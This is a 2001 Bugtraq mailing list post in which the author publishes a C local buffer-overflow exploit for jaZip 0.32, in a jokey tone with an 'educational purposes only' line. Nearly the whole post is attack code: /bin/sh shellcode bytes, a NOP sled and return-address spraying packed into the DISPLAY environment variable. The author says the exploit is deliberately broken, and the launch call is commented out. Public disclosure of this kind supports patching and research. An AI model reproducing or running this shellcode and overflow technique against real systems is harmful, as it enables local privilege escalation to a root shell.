Bugtraq mailing list archives
jazip 0.32 local exploit
From: n33dl3r <n33dl3r () HOTMAIL COM>
Date: Fri, 26 Jan 2001 01:05:42 -0000
Hi folks! In between of heavy gaming i dished up this tiny exploit for jaZip! Educational purposes only. Please dont abuuuse. Hi mum, gimme some food damnit! -- [snip - jazip-exp.c] -- /* * jaZip-0.32 local buffer overflow exploit (tested on debian) * * usage is: ./jazip-exp <offset> <align> * offset: 1500 x N (where N is positive or negative number) * align: 1-3 (0 is def.) * * This exploit is heavily broken, to prevent scriptkiddie abuse! * Thanks to d-blood for helping me with the shellcode. * * c0ded by: needler @ efnet <n33dl3r () hotmail com> * * Oh btw.. fuck college, I'm gonna be a pro CS player. */ #include <stdio.h> #include <stdlib.h> #define BSIZE 2080 #define NOPS 1500 char shellcode[] = "\xeb\x17\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b\x89\xf3\x8d" "\x4e\x08\x31\xd2\xcd\x80\xe8\xe4\xff\xff\xff\x2f\x62\x69\x6e\x2f\x73\x68\x58"; int main(int argc, char **argv, char **envp) { char overflow[BSIZE]; int i, align = 0, offset = 0; u_long addy = 0xbffff9e5; if( argc > 1) offset = atoi(argv[1]); if( argc > 2) align = atoi(argv[2]); memset(overflow, 0x90, BSIZE); memcpy(&overflow[NOPS], shellcode, strlen(shellcode)); memcpy(overflow, "DISPLAY=", 8); for( i = (NOPS + strlen(shellcode)); i < BSIZE; i += 4) *(long *)&overflow[i+align] = addy + offset; envp[0] = overflow; printf("Using address 0x%x\n", addy + offset); // execl("/usr/X11R6/bin/jazip", "jazip", NULL); } -- [snip - jazip-exp.c] -- Terrorists win! (damn i lub CS) --- yours truly, needler
Current thread:
- jazip 0.32 local exploit n33dl3r (Jan 26)
- Re: jazip 0.32 local exploit Peter S Galbraith (Jan 29)